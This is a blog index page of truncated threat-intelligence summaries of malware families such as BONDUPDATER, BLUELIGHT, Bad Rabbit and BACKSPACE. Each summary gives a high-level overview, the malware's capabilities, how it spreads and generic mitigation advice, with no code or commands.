Blogs by Ashwin

  To know more about it, you can go through my detailed document by clicking  here Overview BONDUPDATER, a PowerShell backdoor used by OilRig was detected in November 2017 and updated in August 2018. It has launched various attack campaigns against the Middle East targeting the government as well as corporate sector organizations via phishing emails from time-to-time.  How Does It Works? As stated above, this trojan contains a basic backdoor functionality which permits the threat actors to perform various tasks like- upload and download files, execute commands, terminate running processes, add or delete a file, etc. It make use of DNS tunneling to connect with the C&C server.  Mitigation The following methods might help in mitigating the cyber threat: Always maintain web server patching, log audits, and run the the web services with minimum operating system permissions. Regularly update the security services of all the apps and operating systems present in your system. You should a

  To know more about it, you can go through my detailed document by clicking  here Overview Bonadan is a malicious form of OpenSSH, which can also act as a custom backdoor. It was detected in 2018 and is a combination of new cryptocurrency-mining module and the same credential-stealing module generally used by the Onderon family of backdoors. How Does It works? The module used in this backdoor starts as a new thread that can periodically call two functions after every five minutes. The first one checks and removes any kind of cryptocurrency miner installed on the system, whereas the second one connects with the C&C server and sends the following information about the host: Username corresponding to the user running the backdoor. Version of the OS. External IP address of the infected host. CPU model. RAM size. Speed of the running miner., etc.   Defense  You can use the following methods to defend against the malware: Use long and complex passwords. Enable key-based authentications.

  To know more about it, you can go through my detailed document by clicking  here Overview BLUELIGHT is a Remote Access Trojan (RAT), generally used by APT37 (recently in 2021) which is  a North-Korean state-sponsored cyber threat group that mainly targets the South-Korean public and private sectors including Japan, Vietnam, and the Middle East. It has targeted many industries like chemicals, electronics, manufacturing, aerospace, healthcare, etc.  Cyber Attacks  These cyber threat actors have targeted various South Korean sectors with RokRat Trojan, targets journalists using Chinotto multi-platform malware, etc. while focusing on the various sophisticated organizations of the attacked country. Other Malware Tools used by APT37 APT37 is laced with a wide variety of malicious tools like NavRAT, CORALDECK, Karae, DOGCALL, ROKRAT, ScarCruft, SOUNDWAVE, ZUMKONG, MILKDRO, etc. which is capable of causing a big damage to any system or organization.  Vulnerabilities Exploited  Exploits vulne

  To know more about it, you can go through my detailed document by clicking  here Overview BLININGCAN, a Remote Access Trojan recently used by the North Korean government in 2020 cyber operations against the various Western Europe and the USA organizations like defense, engineering, etc., in order to steal confidential intelligence and secret information. How Does It Works? It generally spreads via phishing emails in which the threat actors acts as the recruiters from a legitimate organization and lure the victims into opening a malicious document (an Office or PDF file) to infect their system. Once they gain access, they begin to collect all the information related to military and energy sectors. Although this attack technique is not novel, but it can still avoid AVs detection. This malware can perform following tasks: Gather local IP address details. Accumulate information about all the system's installed disks. Create, initiate, and terminate a new process. Get processor inform

  To know more about it, you can go through my detailed document by clicking  here Overview BlackMould is a China Chopper-based web shell particularly used for the servers running the Microsoft IIS. It has been exploited by GALLIUM since 2019 for malicious purposes against telecommunication providers. How Does It Works? After the successful infiltration of a network, it can easily steal the credentials via common tools and TTPs (Tactics, Techniques, and Procedures) to move laterally across the network which can be further used in moving among the hosts to also execute processes on the other systems. GALLIUM generally use web shells to gain persistence in the target's network in order to drop their second stage malware payloads. Mitigation The following methods might help in mitigating the cyber threat: Always maintain web server patching, log audits, and run the the web services with minimum operating system permissions. Regularly update the security services of all the apps and op

  To know more about it, you can go through my detailed document by clicking  here Overview BLACKCOFFEE is a malware frequently used by various Chinese cyber threat groups, in order to target U.S. law firms, mining companies, IT companies, and the other non-government organizations. How Does It Works? After successfully infiltrating a system, the malware can perform following tasks: Exfiltration of data. Adding new information. Creating the reverse shell. Creating a log. Terminating the running processes. After decoding the addresses, the malware can easily deliver the stolen data to the operators on the instructions of C&C servers. Prevention The following measures can help in mitigating these kind of threats: Users should be well-trained as well as aware of the potential threats and ways to handle them. Be wary of the emails from untrusted sources. Don't open links or attachments from the untrusted sources. Regularly update your systems, software, and applications. Always use

  To know more about it, you can go through my detailed document by clicking  here Overview BITSAdmin (Background Intelligent Transfer Service Admin) is a command-line tool that can create as well as manage BITS jobs. It is generally used to download files from or upload files to HTTP web servers and SMB file shares. It can also manage network interruptions, pausing and automatically resuming transfers, even after a reboot. How Does It Works? BITSAdmin consists of two switches, viz., '/transfer', and '/addfile' whom working profile is similar to each other while their style of working is quite different. As BITSAdmin downloads files in the form of jobs, these jobs must be defined before moving on; which can be done via various switches. Detection Regular monitoring of the logs for the usage of the BITSAdmin tools and gaining information regarding the transfers through QMGR Database are some of the ways to detect them. However, it was very difficult to detect BITS transf

  To know more about it, you can go through my detailed document by clicking  here Overview BitPaymer is a ransomware-type virus that uses a unique encryption key, ransom note as well as contact information for each operation, and had targeted hospitals of the UK in 2017. As it is often delivered via Dridex, it's considered connected with Dridex malware. How Does It Works? Similar to the other ransomware, this one also spreads via various attack vectors with the help of a targeted phishing campaign against vulnerable organizations. The phishing email urges the victim to click on the link or document that results in the downloading of malware payload. BitPaymer also attacks through Brute Force RPD attack to gain access to a compromised computer network. Prevention The following factors might help in mitigating the ransomware: Regularly conduct a thorough review of all the RDP connections as well as all the public-facing servers. Always use RDP only when it's necessary and that t

  To know more about it, you can go through my detailed document by clicking  here Overview Bisonal RAT is used by Tonto team to target public as well as private sector organizations of Russia, South Korea, and Japan since 2010. Since few years, it has evolved as well as used various techniques to avoid detection while maintaining the core of its RAT the same. How Does It Works? It generally spreads via enticing phishing emails that lures the victims into opening the links or files attached to them. This allows them to create a strong foothold within the victim's networks. They generally attacks a specific target which means that are mainly interested in operational intelligence gathering and espionage.  Prevention: Training-  As humans tend to make mistakes in an IT industry, a regular social engineering awareness training is recommended, so that, they can become the primary firewall to defend against social engineering attacks. Defense in Depth-  An in-depth defense strategy can

  To know more about it, you can go through my detailed document by clicking  here Overview BISCUIT is a backdoor generally used by the Chinese cyber threat actors called APT1 since 2007 and it's known for wide scale as well as high volume attacks on all the English speaking countries or the ones having English as their native language. Similar to the other attack groups, they also use spear phishing emails to spread the malware. Attack Methods It generally uses the following attack methods or tools: Spearphishing Malicious attachments Vulnerable web servers Custom backdoors Mimikatz SQL injections RDP, SSH, data compression before exfiltration, etc. Remedy The following measures may help in the prevention and mitigation of this malware: Regular application update is necessary in order to protect against known vulnerabilities; User input validation should be employed so that local as well as remote file inclusion vulnerabilities can be restricted; Use of web application firewall, r

  To know more about it, you can go through my detailed document by clicking  here Overview BendyBear, an x64 shellcode used for a stage-zero implant that's designed to download malware from a C2 server, was first detected in 2020 and also shares some of its features with Waterbear. Capabilities Some of the important capabilities of BendyBear are: It can easily transmit payloads into modified RC4-encrypted chunks because one RC4 key can't decrypt the entire payload.  It's very difficult to detect as it can perfectly hide from cybersecurity by checking its environment for signs of debugging. It can clear the host's DNS cache whenever it tries to communicate with C2 server, hence, resolving the current IP address of the malicious C2 domain every time. Exclusive session keys are generated for every C2 server connection. As it uses polymorphic code, it can completely change its runtime footprint during code execution in order to thwart memory analysis and avoid sign signatu

  To know more about it, you can go through my detailed document by clicking  here Overview BBSRAT is a type of malware that allows the attackers remotely access the compromised system and execute remote commands, codes, or deploy additional malware in the system. The threat actors behind it are called 'Roaming Tiger' and they are known to specifically target Russia or Russian speaking countries via phishing emails written exclusively in Russian. Capabilities Once it's inside your system, the BBSRAT can perform following task: Execute remote commands and transfer the response to the control server. Delete all the files related to its activity. List running processes and cancel the specific ones.  Receive directory structure and a list of files. Read, edit, or delete files. Upload more files from the control server.    Defensive Measures: Training-  As humans tend to make mistakes in an IT industry, a regular social engineering awareness training is recommended, so that, the

  To know more about it, you can go through my detailed document by clicking  here Overview Bazar has been in use since at least 2020 as a downloader and backdoor attacking the professional services, healthcare, manufacturing, IT, logistics, travel companies, etc. across the USA as well as Europe. It can also easily deploy the other malware or ransomware to steal the sensitive data via its TrickBot campaigns. How Does It Works? Just like every other backdoor, it spreads malware by using spearphishing emails disguised as customer complaints, payroll reports, employee termination lists, etc. containing the links to the Google Docs files. Now once the users click on the link, they will be redirected to a page stating that the said Word Document or Excel Spreadsheet or PDF cannot be viewed properly and they must click on another link to open it. After clicking it, the executable appearing in the form of icons or names related to the file will be downloaded which will later serves as the lo

  To know more about it, you can go through my detailed document by clicking  here Overview Bankshot, that was first detected by Homeland Security in December 2017, is the RAT (Remote Access Tool) used by Lazarus group to infiltrate the Turkish financial sector.  Capabilities The following are some of the tasks that Bankshot is capable of: It can quickly search through your files for specific information, inject code into running processes, and delete files, all of which can facilitate easy access to memory, system resources, elevated rights, etc. It can misuse the Windows Command Shell to move tools or other files into a compromised environment. With the use of obfuscated files, it can also conceal the artifacts of an incursion from any type of forensic investigation. It can falter the Windows services in order to execute malicious payload repeatedly to establish persistence. In order to repeatedly execute a malicious payload to achieve persistence, it can cause the Windows services t

  To know more about it, you can go through my detailed document by clicking  here Overview Bandook, a commercially available RAT that's used by Dark Caracal and also termed as "Operation Manul", was first detected in 2007 and written in Delphi and C++. It generally targets all the sensitive sectors (like government, energy, financial, energy, healthcare, education, and whatnot...) of the countries like USA, South America, Europe, Southeast Asia, etc.  How Does It Works? The Bandook malware spreads in three stages- Firstly, a phishing email is generated which is sent via Microsoft Word document containing an embedded code and once it is opened, the malicious virus will get downloaded. After that, a PowerShell payload is encrypted inside the original word document, and lastly, this script downloads as well as executes the final stage of Bandook, i.e. the backdoor. Prevention The following measures can help in mitigating these kind of threats: Users should be well-trained a

  To know more about it, you can go through my detailed document by clicking  here Overview BadPatch, a Windows trojan that was used in a Gaza Hackers-linked campaign was first detected in 2017 and spreads via phishing emails containing the macro-laced attachments with payload of the malware. Although it attacks only Windows systems, but, there are evidences of it being used in targeting Android devices via a bogus app. Capabilities After successful infiltration, BadPatch may allow the attackers to: Collect information related to the hardware and software host. Look for certain filetypes and filenames, which will be targeted for exfiltration. Swap between SMTP and HTTP C&C (Command & Control) servers. Take screenshots of the active windows and the user's desktop. Execute a keylogging module that would trace the keystrokes of the victim. Remedy The following measures may help in the prevention and mitigation of this trojan: Regular application update is necessary in order to

  To know more about it, you can go through my detailed document by clicking  here Overview BADNEWS is a malware used by the threat actors responsible for Patchwork campaign, discovered by MalwareHunterTeam, and is an updated version of LockCrypt ransomware. When it infects a system, it renders almost all the files useless by encrypting them and demands a ransom by asking the users to buy a particular decrypting tool to restore them. However, it's recommended to not pay the ransom as cyber criminals tends to avoid the victims after receiving the payment.  How Does It Works? The ransomware can be easily distributed via- fake software updaters, peer-to-peer (P2P) networks, third party software download sources, spam email campaigns, and trojans. While fake updaters corrupt the system either by misusing the outdated bugs/flaws or by downloading/installing malware rather than the promised updates; the P2P networks and the other sources make the malware appear as a legitimate software a

  To know more about it, you can go through my detailed document by clicking  here Overview BADFLICK is used as a backdoor by Leviathan via spear phishing campaigns that generally targets U.S. engineering and maritime industries. Although it can't survive a reboot, but can open a reverse shell connection to its C2 server in order to download as well as execute the other malwares. Capabilities  After successfully launching itself into the network, BADFLICK can steal following information: Basic PC information such as PC name, OS version, processor, memory, etc. User account credentials Network information like IP address, routing table, port usage information, ARP list, etc. List of running processes as well as services Folders and files within Program Files, Programs in the Start menu, and List of recent files, etc. This backdoor can also receive commands from the C2 server in order to download and run extra modules or perform whatever task the attacker wish to do. Remedy It is hig

  To know more about it, you can go through my detailed document by clicking  here Overview BADCALL, a trojan malware used by Lazarus group, can make an infected system work as a proxy server via its three different types of 32-bits Windows executables. How Does It Works? Firstly, the malware disables the Windows Firewall, binds a particular network port, and listens for all the incoming connections. This allows the attackers to easily connect with the compromised network via a fake Transport Layer Security (TLS) handshake and also generates an ASCII code to authenticate their connection to BADCALL. Now, the threat actors are capable of commanding the malware to use the compromised system as a proxy server. Prevention The following steps can help in mitigating the malware: Be careful while opening the attachments or links in an unsolicited email. Regularly update the operating systems, antivirus, and the other security products. Use non-administrative account for the other day-to-day c

  To know more about it, you can go through my detailed document by clicking  here Overview Bad Rabbit is a self-propagating ransomware, that mainly targets Ukrainian transportation sectors as well as Russian consumers. This ransomware locks up the victim's system or network from accessing any files, servers, or files until a ransom is paid (generally in Bitcoin). How Does It Works? Bad Rabbit appeared in 2017 and is very similar to the ransomwares like WannaCry and Petya. It spreads via drive-by downloads on a malicious or compromise website posing as a Adobe Flash Installer and when the victim clicks on the malicious link, the users files will be encrypted and a message like- "If you see this text, your files are no longer accessible. You might be looking for ways to recover them. Don't waste your time." After that a ransom in bitcoins is demanded along with a deadline to fulfill it, however, the payment does not always help in unlocking the encrypted files. Remedy

  To know more about it, you can go through my detailed document by clicking  here Overview BACKSPACE is a backdoor used by APT 30 since 2005 and targets companies as well as organizations of various fields active in the countries like India, South Korea, Malaysia, Vietnam, Thailand, Saudi Arabia, USA, etc.  How Does It Works? This malware mainly targets Microsoft Windows Operating Systems and spreads via spear phishing emails containing malicious links/attachments. It can also infect the disconnected systems from the network and steal the sensitive information. BACKSPACE can also bypass host-based firewalls and uses a technique that helps the transfer of metadata to the attacker without garnering any attention.  Prevention The following techniques may be of great help in the defense against BACKSPACE as well as the other similar threats: Identifying the digital shadow assets, along with the cloud hosts, with the help of Attack Surface Management solution.  Always keeping track of the